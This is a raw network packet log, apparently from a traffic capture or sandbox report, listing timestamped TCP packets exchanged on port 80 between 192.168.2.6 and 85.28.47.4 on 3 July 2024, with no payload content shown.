                                                                Jul 3, 2024 08:38:18.142591000 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.142601967 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.142602921 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.142601967 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.142613888 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.142625093 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.142630100 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.142637014 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.142647028 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.142648935 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.142672062 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.142690897 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.143201113 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.143212080 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.143223047 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.143234968 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.143244028 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.143245935 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.143256903 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.143271923 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.143271923 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.143282890 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.143294096 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.143294096 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.143306017 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.143310070 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.143316984 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.143327951 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.143338919 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.143349886 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.143353939 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.143362045 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.143373966 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.143383026 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.144025087 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.144129038 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.144140959 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.144151926 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.144162893 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.144171953 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.144182920 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.144192934 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.144206047 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.144210100 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.144216061 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.144226074 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.144227028 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.144237995 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.144248009 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.144252062 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.144259930 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.144269943 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.144279957 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.144282103 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.144293070 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.144298077 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.144304037 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.144316912 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.144321918 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.144347906 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.145077944 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.145090103 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.145100117 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.145111084 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.145122051 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.145128012 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.145133018 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.145143032 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.145153999 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.145157099 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.145164967 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.145174980 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.145175934 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.145181894 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.145186901 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.145189047 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.145191908 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.145199060 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.145203114 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.145210028 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.145287991 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.226583958 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.226598024 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.226608038 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.226619959 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.226630926 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.226643085 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.226654053 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.226811886 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.226814985 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.226824045 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.226835012 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.226840019 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.226846933 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.226923943 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.226939917 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.226942062 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.226949930 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.226960897 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.226970911 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.226977110 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.226993084 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.227009058 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.227042913 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.227212906 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.227224112 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.227238894 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.227250099 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.227260113 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.227261066 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.227278948 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.227305889 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.227499962 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.227519989 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.227544069 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.227570057 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.227570057 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.227581978 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.227592945 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.227602959 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.227612019 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.227613926 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.227623940 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.227639914 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.227662086 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.228089094 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.228101015 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.228111029 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.228116035 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.228126049 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.228137016 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.228138924 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.228147030 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.228157997 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.228168011 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.228168011 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.228183031 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.228193045 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.228193998 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.228204966 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.228207111 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.228214979 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.228225946 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.228235960 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.228262901 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.228797913 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.228809118 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.228818893 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.228827953 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.228837967 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.228847027 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.228848934 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.228859901 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.228862047 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.228869915 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.228885889 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.228909016 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.229275942 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.229295015 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.229300976 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.229310036 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.229327917 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.229337931 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.229342937 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.229347944 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.229360104 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.229371071 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.229372025 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.229382038 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.229392052 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.229393005 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.229403019 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.229414940 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.229414940 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.229424953 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.229434967 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.229434967 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.229445934 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.229455948 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.229482889 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.230227947 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.230242014 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.230252981 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.230263948 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.230273962 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.230278969 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.230288029 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.230297089 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.230298996 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.230309963 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.230312109 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.230320930 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.230331898 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.230341911 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.230345011 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.230353117 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.230362892 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.230370045 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.230374098 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.230385065 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.230393887 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.230393887 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.230406046 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.230413914 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.230417013 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.230432034 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.230458975 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.231199026 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.231210947 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.231220961 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.231231928 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.231241941 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.231247902 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.231251955 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.231261969 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.231267929 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.231276035 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.231286049 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.231287003 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.231297016 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.231307030 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.231307983 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.231317997 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.231328011 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.231329918 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.231338978 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.231348038 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.231349945 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.231360912 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.231365919 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.231370926 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.231393099 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.231415987 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.232063055 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.232074022 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.232083082 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.232088089 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.232105970 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.232119083 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.232129097 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.232131958 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.232140064 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.232156038 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.232162952 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.232167959 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.232178926 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.232183933 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.232599020 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.313596964 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.313643932 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.313664913 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.313677073 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.313688040 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.313699961 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.313741922 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.313777924 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.313822031 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.313833952 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.313860893 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.313888073 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.313894033 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.313930035 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.313986063 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.313997984 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.314007998 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.314018011 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.314028978 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.314034939 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.314063072 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.314073086 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.314296007 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.314308882 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.314313889 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.314327955 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.314347029 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.314349890 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.314357996 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.314368963 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.314373970 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.314378977 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.314389944 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.314404964 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.314430952 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.314784050 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.314796925 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.314807892 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.314821005 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.314830065 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.314842939 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.314872026 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.315051079 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.315062046 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.315072060 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.315083027 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.315088987 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.315098047 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.315099955 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.315114975 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.315126896 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.315128088 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.315139055 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.315146923 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.315150023 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.315160990 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.315165997 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.315171003 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.315182924 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.315191984 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.315193892 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.315206051 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.315234900 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.315243959 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.315992117 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.316003084 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.316014051 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.316023111 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.316034079 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.316040039 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.316045046 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.316055059 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.316060066 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.316066027 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.316076040 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.316086054 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.316087961 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.316097021 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.316108942 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.316109896 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.316118956 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.316123009 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.316129923 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.316139936 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.316150904 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.316159964 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.316165924 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.316178083 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.316195965 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.316971064 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.316982985 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.316992998 CEST804971085.28.47.4192.168.2.6
